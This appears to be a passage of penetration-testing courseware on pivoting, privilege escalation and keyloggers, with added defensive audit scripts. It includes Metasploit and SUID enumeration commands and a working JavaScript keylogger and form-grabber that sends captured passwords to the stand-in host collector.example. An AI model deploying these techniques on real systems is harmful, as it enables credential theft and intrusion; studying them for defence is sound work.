Pivoting and relaying are the techniques used to find detailed information about the target network. These techniques are performed after successfully compromising a target system. The compromised system is used to penetrate the target network to access other systems and resources that are otherwise inaccessible from the attacking network.

In the pivoting technique, only the systems accessible through the compromised systems are exploited, whereas in the relaying technique, the resources accessible through the compromised system are explored or accessed. Using pivoting, attackers can open a remote shell on the target system tunneled through the initial shell on the compromised system. In relaying, resources present on the other systems are accessed through a tunneled shell session on the compromised system.

The following diagrams illustrate the pivoting and relaying techniques:
Figure 6.87: Illustration of pivoting

Figure 6.88: Illustration of relaying

Detailed explanation of the pivoting and relaying techniques is as follows:
Pivoting

In this technique, the first objective of an attacker is to compromise a system to gain a remote shell on it, and further bypass the firewall to pivot through the compromised system and gain access to the other vulnerable systems in the network. Once the system is successfully compromised, a Meterpreter session is established. As the session is pivoted through the compromised system, the target system cannot determine the actual origin of the exploitation.

Steps to perform pivoting:

1. Discover live hosts in the network

Once a system is compromised, an ARP scan is performed to discover the list of live systems in the network. For example, an attacker uses the following command to detect live hosts in the target network:

> run post/windows/gather/arp_scanner RHOSTS=<target subnet range>
Figure 6.89: Screenshot of Metasploit showing results of arp_scanner
As shown in the screenshot, the scan results show seven IP addresses reachable from the compromised system. To find out more information about these IP addresses, attackers perform port scanning.

2. Set up routing rules

Prior to using Metasploit to run a port scanner against the two IP addresses in the target network, attackers implement routing rules to instruct Metasploit to route all the traffic destined to the private network using the existing Meterpreter session established between the attacker's system and the compromised system. For example, an attacker can use the following commands to perform this step:

> background
Figure 6.90: Screenshot of Metasploit setting up routing rule

3. Scan ports of live systems

As shown in the screenshot, the result displays the open ports on the private systems.

Figure 6.91: Screenshot of Metasploit showing results of port scan
4. Exploit vulnerable services

After the ports are scanned, the vulnerable services running on those ports can be exploited. For example, an attacker can use the BypassUAC exploit to bypass the User Access Control (UAC) setting. As shown in the screenshot, a successful session is established to the vulnerable system by pivoting through a compromised system.

Figure 6.92: Accessing the target system
Relaying

If the pivoting technique is unsuccessful, attackers use the relaying technique to exploit a vulnerable system in the target network. Attackers use relaying to access resources present on other systems in the target network via the compromised system in such a way that the requests to access the resources come from the initially compromised system.

Steps to perform relaying:

1. Set up port forwarding rules

The main purpose of port forwarding is to allow a user to reach a specific port on a system that is not present on the same network. The initially compromised system is responsible for allowing direct access to the system, which is otherwise inaccessible from the attacking system.

Using a Meterpreter session, a listener can be created using a port number from a list of open ports on the localhost, which links that listener to a port on a remote server. This linking of ports is known as port forwarding.

For example, here, the attacker chose port numbers 80, 22, and 445 to set up port forwarding rules.

Figure 6.93: Applying port forwarding rules

2. Access the system resources
Other Privilege Escalation Techniques
Access Token Manipulation

In Windows OSs, access tokens are used to determine the security context of a process or thread. These tokens include the access profile (identity and privileges) of a user associated with a process. After a user is authenticated, the system produces an access token for the process.
Application Shimming

The Windows OSs use a Windows Application Compatibility Framework called shims to provide compatibility between the older and newer versions of Windows. For example, shimming allows programs created for Windows XP to be compatible with Windows 10. Shims provide a buffer between the program and the OS. This buffer is referenced when a program is executed to verify whether the program requires access to the shim database. When a program needs to communicate with the OS, the shim database uses API hooking to redirect the code. All the shims installed by the default Windows installer (sdbinst.exe) are stored at

%WINDIR%\AppPatch\sysmain.sdb
hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb

Shims run in user mode, and they cannot modify the kernel. Some of these shims can be used to bypass UAC (RedirectEXE), inject malicious DLLs (InjectDLL), capture memory addresses (GetProcAddress), etc. An attacker can use these shims to perform different attacks including disabling Windows Defender, privilege escalation, installing backdoors, etc.
File System Permissions Weakness

Many processes in the Windows OSs execute binaries automatically as part of their functionality or to perform certain actions. If the file system permissions of these binaries are not set properly, then the target binary file may be replaced with a malicious file, and the actual process can execute it. If the process that is executing this binary has higher-level permissions, then the binary also executes under higher-level permissions, which may include SYSTEM. Attackers can exploit this technique to replace original binaries with malicious binaries to escalate privileges. Attackers use this technique to manipulate Windows service binaries and self-extracting installers.
Path Interception

Path interception is a method of placing an executable in a particular path in such a way that the application will execute it in place of the legitimate target. Attackers can exploit several flaws or misconfigurations to perform path interception like unquoted paths (service paths and shortcut paths), path environment variable misconfiguration, and search order hijacking. Path interception helps an attacker to maintain persistence on a system and escalate privileges.
Scheduled Task

The Windows OS includes utilities such as 'at' and 'schtasks.' A user with administrator privileges can use these utilities in conjunction with the Task Scheduler to schedule programs or scripts that can be executed at a particular date and time. If a user provides proper authentication, he/she can also schedule a task from a remote system using a remote procedure call (RPC). An attacker can use this technique to execute malicious programs at system startup, maintain persistence, perform remote execution, escalate privileges, etc.
Launch Daemon

During the MacOS and OS X booting process, launchd is executed to complete the system-level system initialization process. Parameters for each launch-on-demand system-level daemon found in /System/Library/LaunchDaemons and /Library/LaunchDaemons are loaded using launchd. These daemons have property list files (plist) that are linked to executables that run at the time of booting. Attackers can create and install a new launch daemon, which can be configured to execute at boot-up time using launchd or launchctl to load plist into the relevant directories. The weak configurations allow an attacker to alter the existing launch daemon's executable to maintain persistence or to escalate privileges.
Plist Modification

In MacOS and OS X, plist (property list) files include all the necessary information that is needed to configure applications and services. These files describe when programs should execute, the executable file path, program parameters, essential OS permissions, etc. The plist files are stored at specific locations like /Library/Preferences (which execute with high-level privileges) and ~/Library/Preferences (which execute with user privileges). Attackers can access and alter these plist files to execute malicious code on behalf of a legitimate user, and further use them as a persistence mechanism and to escalate privileges.
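The weak configuration described in the Launch Daemon and Plist Modification passages is a root-run job whose plist or executable can be rewritten by an ordinary user. The following added example (not from the courseware) audits one launchd plist the way a defender would: it resolves the program the job runs and checks that the plist, the binary and their directories are owned by the trusted user and not writable by group or others. The daemon label, helper script and directories are constructed for the demo; on a real Mac the trusted owner is root (uid 0).

```python
import os
import plistlib
import stat
import tempfile
from typing import Dict, List


def daemon_executable(plist_bytes: bytes) -> str:
    """Executable a launchd job will run: Program, else ProgramArguments[0]."""
    job = plistlib.loads(plist_bytes)
    if job.get("Program"):
        return job["Program"]
    args = job.get("ProgramArguments") or []
    return args[0] if args else ""


def path_issues(path: str, trusted_uid: int) -> List[str]:
    """Why a path is unsafe for a root-run job: wrong owner, or writable by group/others.

    The parent directory is checked as well, because a writable directory lets an
    attacker replace the file even when the file itself is locked down.
    """
    issues: List[str] = []
    for label, target in (("file", path), ("dir", os.path.dirname(path) or ".")):
        try:
            st = os.lstat(target)  # lstat: a symlink swapped in by an attacker is itself suspicious
        except OSError:
            issues.append(f"{label}-missing")
            continue
        if st.st_uid != trusted_uid:
            issues.append(f"{label}-owner")
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            issues.append(f"{label}-writable")
    return issues


def audit_launch_daemon(plist_path: str, trusted_uid: int = 0) -> Dict[str, object]:
    """Check one LaunchDaemons plist and the binary it points at."""
    with open(plist_path, "rb") as fh:
        exe = daemon_executable(fh.read())
    return {
        "plist": plist_path,
        "executable": exe,
        "plist_issues": path_issues(plist_path, trusted_uid),
        "exe_issues": path_issues(exe, trusted_uid) if exe else ["no-program"],
    }


def demo() -> Dict[str, object]:
    """Constructed daemon: a correctly protected plist pointing at a world-writable helper."""
    with tempfile.TemporaryDirectory() as tmp:
        daemons = os.path.join(tmp, "LaunchDaemons")  # stands in for /Library/LaunchDaemons
        bindir = os.path.join(tmp, "bin")
        os.makedirs(daemons)
        os.makedirs(bindir)
        os.chmod(daemons, 0o755)
        os.chmod(bindir, 0o755)
        helper = os.path.join(bindir, "acme-helper.sh")
        with open(helper, "w") as fh:
            fh.write("#!/bin/sh\nexit 0\n")
        os.chmod(helper, 0o777)  # the weak configuration: anyone can replace code that root runs
        plist_path = os.path.join(daemons, "com.example.acme.plist")
        job = {"Label": "com.example.acme",
               "ProgramArguments": [helper, "--daemon"],
               "RunAtLoad": True}
        with open(plist_path, "wb") as fh:
            plistlib.dump(job, fh)
        os.chmod(plist_path, 0o644)
        # trusted_uid=os.getuid(): the demo files are ours; on a real Mac pass 0 for root.
        return audit_launch_daemon(plist_path, trusted_uid=os.getuid())


if __name__ == "__main__":
    print(demo())
```

Running the audit over every plist in /Library/LaunchDaemons with the default trusted_uid of 0 lists the jobs whose executable a non-root user could swap.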
Setuid and Setgid

In Linux and MacOS, if an application uses setuid or setgid, the application will execute with the privileges of the owning user or group, respectively. Generally, the applications run under the current user's privileges. There are certain circumstances where the programs must be executed with elevated privileges but the user running the program does not need the elevated privileges. In this scenario, one can set the setuid or setgid flags for their applications. An attacker can exploit the applications with the setuid or setgid flags to execute malicious code with elevated privileges.
Web Shell

A web shell is a web-based script that allows access to a web server. Web shells can be created in all OSs like Windows, Linux, MacOS, and OS X. Attackers create web shells to inject a malicious script on a web server to maintain persistent access and escalate privileges. Attackers use a web shell as a backdoor to gain access and control a remote server. Generally, a web shell runs under the current user's privileges. Using a web shell, an attacker can perform privilege escalation by exploiting local system vulnerabilities. After escalating privileges, an attacker can install malicious software, change user
Abusing SUID and SGID Permissions

Set User Identification (SUID) and Set Group Identification (SGID) are access permissions given to a program file in UNIX-based systems. These permissions usually allow the users on the system to run a program with temporarily elevated privileges or root privileges to execute a particular task. The files with SUID and SGID rights run with higher privileges.

In Linux, there are some commands and binaries that can be executed by the attackers to elevate their privileges from non-root users to root users, if flags of SUID and SGID rights are set. Some of the executable commands that can be used by attackers to spawn a shell and escalate privileges are Nmap, vim, less, more, Bash, Cat, cp, echo, find, Nano, etc.

Attackers can use the following commands to find SUID and SGID files in the target system:

# Find SUID
find / -perm -u=s -type f 2>/dev/null
# Find SGID
find / -perm -g=s -type f 2>/dev/null
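Defenders run the same search and compare the result against what the system is supposed to have. The following added example (not from the courseware) reimplements the two find commands above in Python, then reports set-id files whose names are not on an approved baseline; the baseline set and the temporary directory tree it audits are constructed for the demo.

```python
import os
import stat
import tempfile
from typing import Dict, List, Set

# Constructed approved list for the demo; a real audit compares against the
# package manager's manifest or a golden image, not a hand-typed set.
BASELINE_SETID: Set[str] = {"passwd", "su", "sudo", "mount", "umount", "ping", "wall"}


def find_setid_files(root: str) -> Dict[str, List[str]]:
    """Equivalent of 'find root -perm -u=s -type f' and '-perm -g=s -type f'."""
    found: Dict[str, List[str]] = {"suid": [], "sgid": []}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: never follow symlinks
            except OSError:
                continue  # unreadable entries, the same as 2>/dev/null above
            if not stat.S_ISREG(st.st_mode):
                continue  # -type f
            if st.st_mode & stat.S_ISUID:
                found["suid"].append(path)
            if st.st_mode & stat.S_ISGID:
                found["sgid"].append(path)
    return found


def unexpected_setid(found: Dict[str, List[str]], baseline: Set[str]) -> List[str]:
    """Set-id files whose name is not on the approved baseline: candidates for review."""
    every = set(found["suid"]) | set(found["sgid"])
    return sorted(p for p in every if os.path.basename(p) not in baseline)


def demo() -> Dict[str, List[str]]:
    """Build a constructed directory tree with known modes and audit it (no real /bin involved)."""
    modes = {"passwd": 0o4755, "wall": 0o2755, "backup_helper": 0o4755, "notes.txt": 0o644}
    with tempfile.TemporaryDirectory() as tmp:
        for name, mode in modes.items():
            path = os.path.join(tmp, name)
            with open(path, "w") as fh:
                fh.write("#!/bin/sh\n")
            os.chmod(path, mode)
        found = find_setid_files(tmp)
        return {
            "suid": sorted(os.path.basename(p) for p in found["suid"]),
            "sgid": sorted(os.path.basename(p) for p in found["sgid"]),
            "unexpected": [os.path.basename(p) for p in unexpected_setid(found, BASELINE_SETID)],
        }


if __name__ == "__main__":
    print(demo())
```

Calling find_setid_files("/") with a baseline taken from the distribution's package database turns the attacker's enumeration into a recurring integrity check.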
Kernel Exploit

Kernel exploits refer to programs that can exploit vulnerabilities present in the kernel to execute arbitrary commands or code with higher privileges. By successfully exploiting kernel vulnerabilities, attackers can attain superuser or root-level access to the target system. To run a kernel exploit, attackers must have configuration details of the target system.

Attackers use the following commands to obtain details such as the OS, kernel version, and architecture of the target system:

# OS
cat /etc/issue
# Kernel version
cat /proc/version
# Architecture

Attackers search https://www.exploit-db.com and execute Python scripts such as linprivchecker.py to detect kernel exploits for escalating privileges.
Privilege Escalation Tools

Privilege escalation tools such as BeRoot, linpostexp, Windows Exploit Suggester, etc. allow attackers to run a configuration assessment on a target system to find information about the underlying vulnerabilities, services, file and directory permissions, kernel version, architecture, etc. Using this information, attackers can further find a way to exploit and elevate their privileges on the target system.
BeRoot

Source: https://github.com

BeRoot is a post-exploitation tool to check common misconfigurations to find a way to escalate privilege. As shown in the screenshot, using this tool, attackers can obtain information about service permissions, writeable directories with their locations, permissions on startup keys, etc.

Figure 6.94: Screenshot of BeRoot showing service permissions
Figure 6.95: Screenshot of BeRoot showing Startup and Task Scheduler keys permissions

linpostexp

Source: https://github.com

The linpostexp tool obtains detailed information on the kernel, which can be used to escalate privileges on the target system. As shown in the screenshot, using this tool, attackers can obtain information about the kernel, filesystems, superuser, sudoers, sudo version, etc. Attackers can use this information to exploit vulnerabilities present in the kernel to elevate their privileges. The following command is used to extract this information about the target system:

python linprivchecker.py
Figure 6.97: Screenshot of linpostexp showing user, filesystem, and environmental info
How to Defend Against Privilege Escalation

The following are the best countermeasures to defend against privilege escalation:

- Restrict interactive logon privileges
- Run users and applications with the lowest privileges
- Implement multi-factor authentication and authorization
- Run services as unprivileged accounts
- Implement a privilege separation methodology to limit the scope of programming errors and bugs
- Use an encryption technique to protect sensitive data
- Reduce the amount of code that runs with a particular privilege
- Perform debugging using bounds checkers and stress tests
- Test the system thoroughly for application coding errors and bugs
- Regularly patch and update the kernel
- Change UAC settings to "Always Notify," so that it increases the visibility of the user when UAC elevation is requested
- Restrict users from writing files to the search paths for applications
- Continuously monitor file system permissions using auditing tools
- Reduce the privileges of user accounts and groups so that only legitimate administrators can make service changes
- Use whitelisting tools to identify and block malicious software that changes file, directory, or service permissions
- Use fully qualified paths in all Windows applications
- Ensure that all executables are placed in write-protected directories
- In Mac OSs, prevent plist files from being altered by users by making them read-only
- Block unwanted system utilities or software that may be used to schedule tasks
- Regularly patch and update the web servers
- Disable the default local administrator account
- Detect, repair, and fix any flaws or errors in services running in the system
- Defend against abusing sudo rights:
  - Implement a strong password policy for sudo users
  - Turn off password caching by setting the timestamp_timeout to 0, so that every time sudo is executed users must input their password
  - Separate sudo-level administrative accounts from the administrator's regular accounts, to prevent stealing of sensitive passwords
  - Update user permissions and accounts at regular intervals
  - Test sudo users with access to programs containing parameters for arbitrary code execution
Tools for Defending against DLL and Dylib Hijacking
Dependency Walker

Source: http://www.dependencywalker.com

Dependency Walker is useful for troubleshooting system errors related to loading and executing modules. It detects many common application problems, such as missing modules, invalid modules, import/export mismatches, circular dependency errors, etc. As shown in the screenshot, cybersecurity professionals use Dependency Walker to verify all the DLLs used by an application, the location from which DLLs are loaded, missing DLLs, etc. This information helps security professionals to detect, patch, and fix misconfigured DLLs in the systems.

Figure 6.98: Screenshot of Dependency Walker
Dylib Hijack Scanner

Source: https://objective-see.com

Dylib Hijack Scanner (DHS) is a simple utility that will scan your computer for applications that are either susceptible to dylib hijacking or have been hijacked. As shown in the screenshot, security professionals use DHS to detect applications that have been hijacked or are vulnerable to dylib hijacking. This information helps them to patch and fix these applications.

Figure 6.99: Screenshot of Dylib Hijack Scanner
Defending against Spectre and Meltdown Vulnerabilities

Various countermeasures to defend against privilege escalation attacks that exploit Spectre and Meltdown vulnerabilities are as follows:
- Regularly patch and update OSs and applications
- Enable continuous monitoring of critical services and firmware running on the system and network
- Regularly patch vulnerable software such as browsers
- Install and update ad-blockers and anti-malware software to block injection of malware through compromised websites
- Enable traditional protection measures such as endpoint security tools to prevent unauthorized system access
- Block services and applications that allow unprivileged users to execute code
- Never install unauthorized software or access untrusted websites from systems storing sensitive information
- Use data loss prevention (DLP) solutions to prevent leakage of critical information from runtime memory
- Frequently check with the manufacturer for BIOS updates and follow the instructions provided by the manufacturer to install the updates
Tools for Detecting Spectre and Meltdown Vulnerabilities
InSpectre

Figure 6.100: Screenshot of InSpectre showing Spectre and Meltdown vulnerabilities
Spectre & Meltdown Checker

Source: https://github.com

Spectre & Meltdown Checker is a shell script to determine whether a system is vulnerable against various "speculative execution" CVEs. For Linux systems, the script will detect mitigations, including backported non-vanilla patches, regardless of the advertised kernel version number or the distribution (such as Debian, Ubuntu, CentOS, RHEL, Fedora, openSUSE, Arch, etc.). As shown in the screenshot, security professionals use Spectre & Meltdown Checker to determine whether the system is immune to speculative execution vulnerabilities. This tool helps them in verifying whether the system has the known correct mitigations in place.

Figure 6.101: Screenshot of Spectre & Meltdown Checker showing Spectre and Meltdown vulnerabilities

Figure 6.102: Screenshot of Spectre & Meltdown Checker showing Spectre and Meltdown vulnerabilities
Module Flow

Maintaining Access

After gaining access and escalating privileges on the target system, attackers now try to maintain their access for further exploitation of the target system or make the compromised system a launchpad from which to attack other systems remotely in the network. Attackers execute malicious applications such as keyloggers, spyware, and other malicious programs to maintain their access to the target system and steal critical information such as usernames and passwords. Attackers hide their malicious programs or files using rootkits, steganography, NTFS data streams, etc. to maintain their access to the target system.
Executing Applications

Once attackers gain higher privileges in the target system by trying various privilege escalation attempts, they may attempt to execute a malicious application by exploiting a vulnerability to execute arbitrary code. By executing malicious applications, the attacker can steal personal information, gain unauthorized access to system resources, crack passwords, capture screenshots, install a backdoor for maintaining easy access, etc.

Attackers execute malicious applications at this stage in a process called "owning" the system. Once they acquire administrative privileges, they will execute applications. Attackers may even try to do so remotely on the victim's machine to gather the same information as above.

The malicious programs attackers execute on target systems can be:

- Backdoors: Program designed to deny or disrupt operation, gather information that leads to exploitation or loss of privacy, or gain unauthorized access to system resources.
Remote Code Execution Techniques

These techniques are often performed after compromising a system initially and further expanding access to remote systems present on the target network. Some examples of remote code execution techniques are as follows:
- Exploitation for Client Execution

Insecure coding practices in software can make it vulnerable to various attacks. Attackers can exploit these underlying vulnerabilities in software through focused and targeted exploitations with an objective of arbitrary code execution to maintain access to the target remote system. Different types of exploitations for client execution are as follows:

  - Web-Browser-Based Exploitation

  Attackers target web browsers through spearphishing links and drive-by compromise. The remote systems can be compromised through normal web browsing or through several users who are targeted victims of spearphishing links to attacker-controlled sites used to exploit the web browser. This type of exploitation does not need user intervention for execution.

  - Office-Applications-Based Exploitation

  Attackers target common office applications such as Microsoft Office through different variants of spearphishing. Emails containing links to malicious files are sent to the end-users directly for downloading. To run the exploit, end-users are required to open a malicious document or file.

  - Third-Party Applications-Based Exploitation

  Attackers can also exploit commonly used third-party applications deployed as part of the software. Applications such as Adobe Reader, Flash, etc. are usually targeted by attackers to gain access to remote systems.
- Scheduled Task

Scheduled tasks allow users to perform routine tasks chosen for a computer automatically. There are two utilities, at and schtasks, that can be used along with Windows Task Scheduler to execute specific code or script at a scheduled date and time. Using task scheduling, attackers can execute malicious programs at system startup, or schedule it for a specific date and time to maintain access to the target system and further perform remote code execution to gain admin-level privileges to the remote system.
- Service Execution

System services are programs that run and operate at the backend of an OS. Attackers run binary files or commands that can communicate with Windows system services such as Service Control Manager. This code execution technique is performed by creating a new service or by modifying an existing service at the time of privilege escalation or maintaining access.
- Windows Management Instrumentation (WMI)

WMI is a feature in Windows administration that manages data and operations on Windows OSs and provides a platform for accessing Windows system resources locally and remotely. Attackers can use the WMI feature to interact with the target system remotely, and use it to perform information gathering on system resources and further execute code for maintaining access to the target system.

- Windows Remote Management (WinRM)
Tools for Executing Applications

Figure 6.103: Screenshot of Remote

Some of the privilege escalation tools are listed as follows:

- Pupy (https://github.com)
- PDQ Deploy (https://www.pdq.com)
- Dameware Remote Support (https://www.dameware.com)
- ManageEngine Desktop Central (https://www.manageengine.com)
- PsExec (https://docs.microsoft.com)
Keylogger

Keyloggers are software programs or hardware devices that record the keys struck on the computer keyboard (also called keystroke logging) of an individual computer user or a network of computers. You can view all the keystrokes of the victim's computer at any time in your system by installing this hardware device or program. It records almost all the keystrokes on a keyboard of a user and saves the recorded information in a text file. As keyloggers hide their processes and interface, the target is unaware of the keylogging. Offices and industries use keyloggers to monitor employees' computer activities, and they can also be used in home environments for parents to monitor children's Internet activities.
Figure 6.104: Demonstration of keylogger
A keylogger, when associated with spyware, helps to transmit a user's information to an unknown third party. Attackers use it illegally for malicious purposes, such as stealing sensitive and confidential information about victims. This sensitive information includes email IDs, passwords, banking details, chat room activity, Internet relay chat (IRC), instant messages, and bank and credit card numbers. The data transmitted over the encrypted Internet connection are also vulnerable to keylogging because the keylogger tracks the keystrokes before encryption.
The keylogger program is installed onto the user's system invisibly through email attachments or "drive-by" downloads when users visit certain websites. Physical keystroke loggers "sit" between keyboard hardware and the OS, so that they can remain undetected and record every keystroke.

A keylogger can:

- Record every keystroke typed on the user's keyboard
- Capture screenshots at regular intervals, showing user activity such as typed characters or clicked mouse buttons
- Track the activities of users by logging Window titles, names of launched applications, and other information
- Monitor the online activity of users by recording addresses of the websites visited and keywords entered
- Record all login names, bank and credit card numbers, and passwords, including hidden passwords or data displayed in asterisks or blank spaces
- Record online chat conversations
- Make unauthorized copies of both outgoing and incoming email messages
Types of Keystroke Loggers

A keylogger is a hardware or software program that secretly records each keystroke on the user keyboard at any time. Keyloggers save captured keystrokes to a file for reading later, or transmit them to a place where the attacker can access it. As these programs record all the keystrokes that are provided through a keyboard, they can capture passwords, credit card numbers, email addresses, names, postal addresses, and phone numbers. Keyloggers can capture information before it is encrypted. This gives the attacker access to passphrases and other "well-hidden" information.

There are two types of keystroke loggers: hardware keyloggers and software keyloggers. Both types help attackers to record all keystrokes entered on the target system.
Hardware Keystroke Loggers

Hardware keyloggers are hardware devices that look like normal USB drives. Attackers can connect these keyloggers between a keyboard plug and a USB socket. All the keystrokes typed by the user are stored in the hardware unit. Attackers retrieve this hardware unit to access the keystrokes that are stored in it. The primary advantage of these loggers is that no anti-spyware, antivirus, or desktop security program can detect them, because nothing runs on the host. Their disadvantage is the easy discovery of their physical presence.
There are three main types of hardware keystroke loggers:

* PC/BIOS Embedded

BIOS-level firmware that is responsible for managing keyboard actions can be modified in such a way that it captures the keystrokes that are typed. This requires physical and/or admin-level access to the target computer.

* Keyboard Keylogger

If a hardware circuit is attached to the keyboard cable connector, it can capture the keystrokes. It records all the keyboard strokes to its own internal memory, which can be accessed later. The main advantage of a hardware keylogger over a software keylogger is that it is not OS dependent and, hence, will not interfere with any applications running on the target computer; it is also impossible to discover hardware keyloggers by using any anti-keylogger software.

* External Keylogger

External keyloggers are attached between a standard PC keyboard and a computer. They record each keystroke. External keyloggers do not need any software and work with any PC. You can attach one to your target computer and later read the recorded information on your own PC to look through the keystrokes.
There are four types of external keyloggers:

o PS/2 and USB Keylogger: This is completely transparent to computer operation and requires no software or drivers for functionality. It records all the keystrokes typed by the user on the computer keyboard, and so stores data such as emails, chat records, applications used, IMs, etc.

o Acoustic/CAM Keylogger: Acoustic keyloggers work on the principle of converting the sound of keystrokes (or the keyboard's electromagnetic emanations) into data. They employ either a receiver capable of capturing these signals and converting them into keystroke data, or a CAM (camera) capable of recording the keyboard as it is used.

o Bluetooth Keylogger: This requires physical access to the target computer only once, at the time of installation. After installation on the target PC, it stores all the keystrokes, and you can retrieve the keystroke information in real time by connecting via a Bluetooth device.

o Wi-Fi Keylogger: Besides standard PS/2 and USB keylogger functionality, this features remote access over the Internet. This wireless keylogger will connect to a local Wi-Fi access point and send emails containing the recorded keystroke data. You can also connect to the keylogger at any time over TCP/IP and view the captured log.
Software Keystroke Loggers

These loggers are software installed remotely via a network or an email attachment on a target system for recording all the keystrokes. Here, the logged information is stored as a log file on the computer's hard drive. The logger sends the keystroke logs to the attacker using email protocols. Software loggers can often obtain additional data as well, because they do not have the limitation of physical memory allocation that hardware keystroke loggers have.
The main types of software keystroke loggers are:

o Application Keylogger

An application keylogger allows you to observe everything the user types in his/her emails, chats, and other applications, including passwords. It is even possible to trace records of Internet activity. This is an invisible keylogger to track and record everything happening within the entire network.

o Kernel/Rootkit/Device Driver Keylogger

Attackers rarely use kernel keyloggers because they are difficult to write and require a high level of proficiency from the keylogger developers. These keyloggers exist at the kernel level. Consequently, they are difficult to detect, especially for user-mode applications. This kind of keylogger acts as a keyboard device driver and thus gains access to all information typed on the keyboard.

The rootkit-based keylogger is a forged Windows device driver that records all keystrokes. This keylogger hides from the system and is undetectable, even with standard or dedicated tools.

The device driver keylogger replaces the existing I/O driver with one that has embedded keylogging functionality. This keylogger saves all the keystrokes performed on the computer into a hidden log file, and then sends the file to the destination through the Internet.

o Hypervisor-Based Keylogger

A hypervisor-based keylogger works within a malicious hypervisor running beneath the OS, which itself remains untouched.

o Form-Grabbing-Based Keylogger

A form-grabbing-based keylogger records web form data and then submits it over the Internet. It bypasses HTTPS encryption because it reads the form inputs inside the browser, before they are encrypted. Form-grabbing-based keyloggers log web form inputs by hooking the web browser's "submit" event.

o JavaScript-Based Keylogger

Attackers inject malicious JavaScript tags into the web page of a compromised website to listen to key events such as keyup and keydown (the onkeyup and onkeydown handlers). Attackers use various techniques such as man-in-the-browser, cross-site scripting, etc. to inject the malicious script.

o Memory-Injection-Based Keylogger

Memory-injection-based keyloggers modify the memory tables associated with the web browser and system functions to log keystrokes. Attackers also use this technique to bypass UAC in Windows systems.
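The JavaScript-based and form-grabbing keyloggers above are easiest to understand from the script itself. The following is an added example written for this page; it is not code from the courseware or from any product it names. The collector endpoint collector.example, the page host shop.example, the SAMPLE_HTML page and all function names are assumptions made for illustration. The first half is the attacker's injected script: a capture-phase keydown hook plus a submit hook that grabs the completed form, batched and base64-encoded into a beacon. The second half is a defender's check that scans served HTML for inline scripts that hook key or submit events while talking to a host that is not on the allowlist.

```javascript
// Added example for the JavaScript-based and form-grabbing keyloggers above.
// Not from the CEH courseware or any product it names. The collector host
// (collector.example), the page host (shop.example) and SAMPLE_HTML are
// constructed for illustration.

const EXFIL_URL = 'https://collector.example/log';   // hypothetical attacker endpoint

function toBase64(text) {                              // works in Node and browsers
  if (typeof Buffer !== 'undefined') return Buffer.from(text, 'utf8').toString('base64');
  return btoa(unescape(encodeURIComponent(text)));
}
function fromBase64(b64) {
  if (typeof Buffer !== 'undefined') return Buffer.from(b64, 'base64').toString('utf8');
  return decodeURIComponent(escape(atob(b64)));
}

// ---- attacker side: keystroke hook plus form grabber -----------------------
class CaptureBuffer {
  constructor() { this.keys = []; this.forms = []; }

  // keydown handler: one record per printable key, with the field it was typed into
  onKey(ev) {
    if (typeof ev.key !== 'string' || ev.key.length !== 1) return;   // skip Shift, Enter, ...
    this.keys.push({ field: ev.target && ev.target.name, key: ev.key });
  }

  // submit handler ("form grabbing"): copies the final value of every named
  // field. This also catches pasted, autofilled and on-screen-keyboard input
  // that never produced a keydown, and it sees none of the noise that
  // keystroke-interference tools add, because it never looks at keystrokes.
  onSubmit(ev) {
    const record = {};
    for (const el of ev.target.elements) if (el.name) record[el.name] = el.value;
    this.forms.push(record);
  }

  // batch and encode so the beacon looks like opaque telemetry
  flush() {
    const payload = toBase64(JSON.stringify({ keys: this.keys, forms: this.forms }));
    this.keys = []; this.forms = [];
    return payload;
  }
}

// Capture-phase listeners (third argument true) run before the page's own
// handlers, so stopPropagation() in the page does not hide the event.
function install(buf, doc, nav) {
  doc.addEventListener('keydown', (ev) => buf.onKey(ev), true);
  doc.addEventListener('submit', (ev) => {
    buf.onSubmit(ev);
    nav.sendBeacon(EXFIL_URL, buf.flush());         // queued even as the page unloads
  }, true);
}

// ---- defender side: scan served HTML for injected hooks --------------------
// Flags inline scripts that register key or submit handlers and mention a host
// outside allowedHosts, and external scripts loaded from such a host.
function findSuspiciousScripts(html, allowedHosts) {
  const hits = [];
  const tag = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  const hostOf = (url) => (url.match(/^https?:\/\/([^\/'"\s]+)/i) || [])[1];
  let m;
  while ((m = tag.exec(html)) !== null) {
    const [, attrs, body] = m;
    const src = (attrs.match(/\bsrc\s*=\s*["']([^"']+)["']/i) || [])[1];
    if (src) {
      const h = hostOf(src);
      if (h && !allowedHosts.includes(h)) hits.push({ kind: 'external', src });
      continue;
    }
    const hooks = /key(?:down|up|press)|addEventListener\s*\(\s*['"]submit['"]/i.test(body);
    const foreign = [...body.matchAll(/https?:\/\/([^\/'"\s]+)/gi)]
      .map((x) => x[1]).filter((h) => !allowedHosts.includes(h));
    if (hooks && foreign.length) hits.push({ kind: 'inline', hosts: [...new Set(foreign)] });
  }
  return hits;
}

// Constructed page: a login form, the site's own script, and an injected
// keylogger of the kind described above (XSS or man-in-the-browser).
const SAMPLE_HTML = `
<form action="/login"><input name="user"><input name="password" type="password"></form>
<script src="https://shop.example/app.js"></script>
<script>
var q = [];
document.addEventListener('keydown', function (e) { q.push(e.key); }, true);
document.addEventListener('submit', function () {
  navigator.sendBeacon('https://collector.example/log', q.join(''));
}, true);
</script>`;

// Simulate a victim typing a password and submitting the form; no DOM needed.
function simulate() {
  const buf = new CaptureBuffer();
  const pw = { name: 'password', value: 'hunter2' };
  for (const ch of pw.value) buf.onKey({ target: pw, key: ch });
  buf.onKey({ target: pw, key: 'Enter' });                      // non-printable, ignored
  buf.onSubmit({ target: { elements: [{ name: 'user', value: 'alice' }, pw] } });
  return JSON.parse(fromBase64(buf.flush()));                   // what the collector receives
}

if (typeof document !== 'undefined') install(new CaptureBuffer(), document, navigator);
```

simulate() returns what the collector would receive. Note that onSubmit obtains the password even when it was autofilled or entered with an on-screen keyboard, which is why the virtual-keyboard and form-filler defences listed later in this module stop keystroke hooks but not form grabbers. The scan is a heuristic for reviewing a page, not a substitute for a Content Security Policy that forbids inline scripts and restricts connect-src to known hosts.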
Hardware Keyloggers

We now examine the details of external hardware keyloggers. As discussed previously, there are various types of external hardware keyloggers available on the market. These keyloggers are plugged in line between a keyboard and a computer. These types of keyloggers include:

* PS/2 keylogger
* USB keylogger
* Keylogger embedded inside the keyboard
* Bluetooth keylogger
* Wi-Fi keylogger

